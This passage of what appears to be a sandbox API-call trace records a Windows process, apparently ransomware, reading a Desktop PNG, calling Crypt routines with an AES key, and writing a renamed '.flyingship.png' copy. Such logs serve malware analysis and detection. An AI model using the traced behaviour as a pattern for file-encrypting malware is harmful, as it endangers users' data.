wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0165.495] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0165.495] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.495] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0165.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0165.495] CryptDestroyHash (hHash=0x90ae18) returned 1 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0165.496] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0165.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0165.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0165.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4egakohibj.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0165.498] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.498] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0165.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0165.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0165.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0165.498] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0165.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0165.498] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.498] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0165.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0165.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0165.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0165.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0165.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4egakohibj.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0165.502] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0165.502] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.502] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0165.502] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0165.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0165.503] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0165.503] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x800b, lpOverlapped=0x0) returned 1 [0165.504] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0165.505] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0165.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0165.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0165.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0165.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0165.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x800b) returned 0x9e5190 [0165.505] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0165.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0165.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0165.505] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.506] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0165.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0165.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0165.506] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0165.506] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0165.506] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0165.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0165.507] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0165.507] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0165.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.508] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0165.508] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0165.508] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2758, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2758*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0165.508] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0165.508] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0165.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0165.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0165.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0165.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0165.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0165.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0165.511] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0165.511] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.511] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0165.511] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.511] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0165.511] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0165.511] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0165.511] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0165.511] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0165.511] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0165.512] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.512] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0165.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.512] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.512] PeekMessageW 